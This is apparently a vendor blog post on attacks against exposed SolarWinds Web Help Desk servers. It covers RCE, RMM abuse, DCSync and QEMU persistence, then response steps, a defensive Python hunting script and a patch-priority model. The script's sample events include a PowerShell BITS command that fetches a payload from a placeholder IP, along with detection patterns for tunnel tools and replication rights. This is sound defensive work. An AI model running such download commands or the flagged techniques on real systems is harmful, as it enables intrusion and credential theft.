April 11, 2026 Cyber Trends
Microsoft and incident responders report active exploitation of SolarWinds Web Help Desk. Patch fast, remove exposure, hunt RMM abuse, and protect AD.
Active exploitation of SolarWinds Web Help Desk (WHD) is a clean example of a pattern defenders keep relearning the hard way: one internet-exposed application with a critical flaw can turn into full identity takeover and enterprise-wide impact. Microsoft reported multi-stage intrusions starting from exposed WHD servers, followed by lateral movement toward high-value assets, using low-noise techniques and legitimate admin tooling.
This matters because help desk platforms sit in the blast radius of everything that matters: credentials, tickets with sensitive context, asset visibility, admin workflows, and often a direct line into Active Directory environments. When that foothold is remote code execution without authentication, the only realistic outcome is a race between patching and compromise.
What is being exploited
Multiple vulnerabilities are in scope, and responders have not been able to reliably attribute every intrusion to one specific CVE because some targets were vulnerable to several at the same time. Microsoft explicitly noted it could not confirm which CVE was used in observed December 2025 activity, given overlapping exposure across older and newly disclosed issues.
The key issues referenced across reporting include:
CVE-2025-40551 — deserialization of untrusted data leading to unauthenticated remote code execution.
CVE-2025-40536 — security control bypass that can allow unauthenticated access to restricted functionality.
CVE-2025-26399 — an unauthenticated AjaxProxy deserialization RCE, described as a patch-bypass chain from earlier WHD issues.
CISA added CVE-2025-40551 to the Known Exploited Vulnerabilities catalog and set an accelerated remediation deadline for U.S. federal agencies, reinforcing that exploitation is not theoretical.
How the intrusions unfold
Across Microsoft, Huntress, and additional responder reporting, the operational flow is consistent: initial foothold via exposed WHD, then rapid pivot to persistence, credential access, and identity-centric lateral movement.
Stage 1: Initial access from an internet-exposed WHD server
Successful exploitation of exposed WHD instances has enabled unauthenticated RCE in the WHD application context.
Stage 2: Payload execution and “living off the land”
Microsoft observed post-exploitation activity that spawns PowerShell and uses Windows-native capabilities such as BITS to download and execute payloads.
Stage 3: Persistence using legitimate remote tooling and tunnels
A recurring theme is the abuse of legitimate remote monitoring and management software for persistent, hands-on access.
Microsoft described attackers downloading and using legitimate Zoho ManageEngine components for persistent control.
Huntress documented post-exploitation deployment of Zoho tooling, followed by rapid pivot to additional tooling for control and redundancy, including Cloudflare tunnels and Velociraptor for command-and-control style execution.
Elastic’s write-up aligns with the same themes: RMM abuse, tunneling, and RDP-based persistence after exploitation.
Stage 4: Credential access and identity takeover
This is where WHD exploitation becomes a domain compromise story.
Microsoft observed credential theft techniques including DLL side-loading to access LSASS memory and credential material.
At least one case included DCSync activity, a strong indicator of high privilege and direct Active Directory replication abuse.
Elastic also highlights identity-focused outcomes, including DCSync and efforts consistent with extracting NTDS.dit from a domain controller.
Stage 5: Stealthy long-haul persistence using scheduled tasks and virtualization
One of the more aggressive persistence patterns described is a scheduled task launching QEMU to create an SSH backdoor and isolate attacker activity inside a virtualized environment.
Microsoft described scheduled task creation to launch QEMU under SYSTEM at startup.
Huntress tied this to a recurring scheduled task name and documented QEMU-backed SSH persistence in active cases.
Elastic provided matching details and emphasized detection opportunities around scheduled task creation and QEMU-based tunneling behavior.
What this means for security leaders
This incident is not “a SolarWinds story.” It is an internet-facing application governance failure that becomes an identity compromise story.
Three takeaways matter:
Exposure beats sophistication. If WHD is reachable from the internet, attackers do not need phishing, insider access, or complex initial tradecraft. They need one exploit path.
Legitimate tools are the new malware. Zoho RMM, Cloudflare tunnels, and DFIR tooling can look normal in environments without strict controls and monitoring for dual-use abuse.
Identity is the pivot point. Once attackers get credentials and replication capability, containment cost and blast radius expand sharply, regardless of how the initial foothold occurred.
Immediate response priorities
1) Patch and remove unnecessary exposure
WHD fixes for the highlighted CVEs are available in WHD version 2026.1, and KEV-driven timelines show how fast exploitation follows disclosure.
Operationally, patching alone is not enough for internet-facing systems:
Remove WHD from direct internet exposure wherever possible
Restrict admin paths and enforce network-level controls
Increase logging specifically around WHD application activity and child process execution patterns
2) Hunt for post-exploitation tooling and abnormal remote access
Focus on evidence of new or unauthorized remote tooling and tunneling. Reported activity includes abuse of:
Zoho ManageEngine and related components used for persistent remote control
Cloudflared-based tunnel installation and use
Velociraptor installation and service execution patterns
Scheduled task creation tied to QEMU-backed SSH persistence
3) Rotate credentials and assume identity exposure
Microsoft and Elastic both emphasize credential rotation, starting with service and administrative accounts reachable from the WHD host, and isolating suspected compromised machines.
Treat these as non-negotiable:
Rotate WHD service credentials and any privileged accounts with interactive access to the host
Review AD for replication abuse indicators consistent with DCSync
Validate domain admin group membership integrity and recent changes
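The hunting rules the intrusion stages above and the three response priorities call for, written out as an added Python example (not code from Microsoft, Huntress, Elastic or SolarWinds). It runs over a constructed set of flattened Windows events standing in for Sysmon process creation, Security 4698 (scheduled task created) and Security 4662 (directory object operation) records. The WHD install path, hostnames, task name and IP address are illustrative; the `hunt` function, its parameters and the rule names are this example's own. The replication extended-rights GUIDs are the standard Active Directory values.

```python
import re

# Constructed sample telemetry: flattened dicts standing in for Sysmon process
# creation, Security 4698 (scheduled task created) and Security 4662
# (directory object operation) records. Paths and hostnames are illustrative.
SAMPLE_EVENTS = [
    # WHD application process (assumed Java/Tomcat service under an install
    # path containing "WebHelpDesk") spawning PowerShell that fetches a file
    # through BITS.
    {"kind": "proc", "host": "whd01", "user": "NT AUTHORITY\\SYSTEM",
     "parent": r"C:\Apps\WebHelpDesk\bin\java.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Start-BitsTransfer -Source http://203.0.113.7/x.dat -Destination C:\\ProgramData\\x.dat"},
    # Benign: WHD launching another JVM.
    {"kind": "proc", "host": "whd01", "user": "NT AUTHORITY\\SYSTEM",
     "parent": r"C:\Apps\WebHelpDesk\bin\java.exe",
     "image": r"C:\Apps\WebHelpDesk\bin\java.exe", "cmdline": "java -jar helper.jar"},
    # Tunnel binary running on a file server where no remote tooling is approved.
    {"kind": "proc", "host": "fs02", "user": "CORP\\svc_whd",
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\ProgramData\cloudflared.exe", "cmdline": "cloudflared.exe tunnel run"},
    # Same class of tooling on a host where IT has approved it (suppressed).
    {"kind": "proc", "host": "it-admin01", "user": "CORP\\helpdesk",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\ManageEngine\agent.exe", "cmdline": "agent.exe"},
    # Scheduled task launching QEMU as SYSTEM at boot (task name is a placeholder).
    {"kind": "task", "host": "fs02", "user": "CORP\\svc_whd",
     "task": r"\Microsoft\Windows\PlaceholderTask", "run_as": "SYSTEM", "trigger": "boot",
     "command": r"C:\ProgramData\q\qemu-system-x86_64.exe -nographic -drive file=disk.qcow2"},
    # Benign scheduled task.
    {"kind": "task", "host": "fs02", "user": "CORP\\backupadm",
     "task": r"\Backup\Nightly", "run_as": "SYSTEM", "trigger": "daily",
     "command": r"C:\Tools\backup.exe --full"},
    # 4662: replication rights exercised on the domain naming context by a
    # service account (DCSync-like) and by a domain controller (expected).
    {"kind": "acl", "host": "dc01", "user": "CORP\\svc_whd", "object": "DC=corp,DC=example",
     "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"kind": "acl", "host": "dc01", "user": "CORP\\DC02$", "object": "DC=corp,DC=example",
     "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
]

# Extended-rights GUIDs that a replication partner (or a DCSync attack) needs.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "bitsadmin.exe", "certutil.exe"}
REMOTE_TOOL_MARKERS = ("cloudflared", "velociraptor", "manageengine")
BITS_RE = re.compile(r"start-bitstransfer|bitsadmin(\.exe)?\s+/transfer", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def hunt(events, whd_hosts, approved_remote_tool_hosts, dc_accounts, whd_marker="webhelpdesk"):
    """Return (host, rule, detail) findings for the behaviours described in the post."""
    findings = []
    for e in events:
        host, kind = e["host"], e["kind"]
        if kind == "proc":
            image, cmd = e["image"].lower(), e["cmdline"]
            # Stage 2: the WHD service process should never spawn a shell or downloader.
            if host in whd_hosts and whd_marker in e["parent"].lower() and basename(image) in SHELL_CHILDREN:
                findings.append((host, "whd-spawns-shell", cmd))
            if BITS_RE.search(cmd):
                findings.append((host, "bits-download", cmd))
            # Stage 3: dual-use remote tooling outside the approved fleet.
            if any(m in image for m in REMOTE_TOOL_MARKERS) and host not in approved_remote_tool_hosts:
                findings.append((host, "unapproved-remote-tooling", image))
        elif kind == "task":
            # Stage 5: scheduled task that launches QEMU, especially as SYSTEM at boot.
            if "qemu" in e["command"].lower():
                findings.append((host, "qemu-scheduled-task",
                                 f'{e["task"]} run_as={e["run_as"]} trigger={e["trigger"]}'))
        elif kind == "acl":
            # Stage 4: replication rights used by anything other than a DC computer account.
            guids = set(re.findall(r"\{([0-9a-f-]+)\}", e["properties"].lower()))
            if guids & REPLICATION_GUIDS and e["user"] not in dc_accounts:
                findings.append((host, "dcsync-like-replication", f'{e["user"]} on {e["object"]}'))
    return findings


def run_sample():
    return hunt(SAMPLE_EVENTS, whd_hosts={"whd01"}, approved_remote_tool_hosts={"it-admin01"},
                dc_accounts={"CORP\\DC01$", "CORP\\DC02$"})


if __name__ == "__main__":
    for host, rule, detail in run_sample():
        print(f"{host:10} {rule:26} {detail}")
```

The allowlists are the important design choice: remote tooling and replication rights are legitimate somewhere in every environment, so the rules fire on where and by whom they are used rather than on the tool itself. In a real deployment the `dc_accounts` set should be generated from the domain controllers OU, and the scheduled-task rule should also be checked against the task name reported by Huntress once it is known in your environment.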
InfoSight perspective: this is exactly what exposure management is supposed to prevent
Incidents like this keep happening because most programs still run vulnerability work as a backlog, not as an exposure reduction system.
A functional exposure-management posture does four things consistently:
Find internet-facing services continuously and treat them as emergency-patching scope when critical issues land in the wild.
Prioritize by exploitability and exposure, not by raw CVSS. KEV and confirmed exploitation should override normal patch cycles.
Measure MTTR and patch SLA performance for public-facing systems as a board-level control metric, not an IT hygiene stat.
Prove reduction with defensible evidence across vulnerability state, identity risk indicators, and remediation execution.
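The four practices above, turned into a small prioritization and SLA model as an added Python example (not InfoSight's product or method). Exploitability and exposure place a finding in a tier and CVSS only orders within the tier, which is why a CVSS 9.8 issue on an internal host ends up behind a CVSS 7.5 KEV-listed issue on an internet-facing one. The SLA day counts, the tier scheme, the `CVE-XXXX-*` identifiers and the inventory are all constructed assumptions.

```python
from dataclasses import dataclass
from datetime import date
from typing import Optional

# Illustrative policy: days allowed to remediate, by tier. Tier 0 is the
# emergency lane for internet-facing services with KEV-listed or confirmed
# exploitation; these values are assumptions, not a published standard.
SLA_DAYS = {0: 3, 1: 14, 2: 30, 3: 90}


@dataclass
class Exposure:
    asset: str
    cve: str              # placeholder identifiers in the sample below
    cvss: float
    internet_facing: bool
    exploited: bool       # KEV-listed or confirmed in-the-wild exploitation
    disclosed: date
    remediated: Optional[date] = None


def tier(x: Exposure) -> int:
    """Exploitability and exposure decide the lane; CVSS only orders within it."""
    if x.internet_facing and x.exploited:
        return 0
    if x.exploited:
        return 1
    if x.internet_facing:
        return 2
    return 3


def prioritized(items):
    return sorted(items, key=lambda x: (tier(x), -x.cvss))


def days_open(x: Exposure, today: date) -> int:
    return ((x.remediated or today) - x.disclosed).days


def sla_breaches(items, today: date):
    """Assets whose fix took, or has so far taken, longer than the tier SLA."""
    return [(x.asset, x.cve) for x in items if days_open(x, today) > SLA_DAYS[tier(x)]]


def public_facing_mttr(items, today: date) -> Optional[float]:
    """Mean days-to-remediate for internet-facing items that are already fixed."""
    done = [days_open(x, today) for x in items if x.internet_facing and x.remediated]
    return sum(done) / len(done) if done else None


# Constructed sample inventory.
SAMPLE = [
    Exposure("whd01", "CVE-XXXX-0001", 9.8, True, True, date(2026, 3, 20), date(2026, 3, 25)),
    Exposure("intranet-app", "CVE-XXXX-0002", 9.8, False, False, date(2026, 3, 1)),
    Exposure("vpn01", "CVE-XXXX-0003", 7.5, True, True, date(2026, 4, 1)),
    Exposure("mail01", "CVE-XXXX-0004", 6.5, True, False, date(2026, 2, 1), date(2026, 2, 20)),
]
TODAY = date(2026, 4, 11)

if __name__ == "__main__":
    for x in prioritized(SAMPLE):
        print(f"tier {tier(x)}  {x.asset:13} {x.cve} cvss={x.cvss} open={days_open(x, TODAY)}d")
    print("SLA breaches:", sla_breaches(SAMPLE, TODAY))
    print("public-facing MTTR (days):", public_facing_mttr(SAMPLE, TODAY))
```

Note that `sla_breaches` counts both closed items that exceeded the lane and open items that have already aged past it, so the metric cannot be improved by leaving findings open; that is the property a board-level control needs.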
This is where InfoSight’s approach matters: operationalize vulnerability and identity risk into measurable signals, track remediation speed, and produce reporting that shows exposure is trending down before an attacker proves it for you.